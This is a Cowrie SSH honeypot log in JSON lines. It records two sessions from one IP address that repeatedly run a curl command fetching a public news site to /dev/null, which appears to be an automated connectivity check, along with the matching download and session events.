{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.035187Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.043319Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.045031Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.046468Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.072858Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.075961Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.077150Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.085465Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.094580Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.095773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.114621Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.115974Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.120908Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.122809Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.134815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.136029Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.144550Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.154720Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.156025Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.175376Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.176540Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.187275Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.193186Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.194889Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.195931Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.214913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.215931Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.227264Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.230200Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.231143Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.255760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.257117Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.262910Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.264516Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.268866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.270000Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.274033Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.276069Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.292761Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.295791Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.296602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.306971Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.312439Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.313323Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.323864Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.336000Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.337006Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.341294Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.349138Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.350090Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.359145Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.376081Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.377314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.383720Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.384710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.385772Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.415804Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.416936Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.437338Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.438784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.440333Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.447154Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.449666Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.471937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.473023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.500447Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.504056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.505041Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.515063Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.516161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.517341Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.528469Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.535734Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.539451Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.540420Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.543911Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.556742Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.557993Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.563554Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.565630Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.575225Z","src_ip":"212.227.125.160","session":"7541ed730449"}
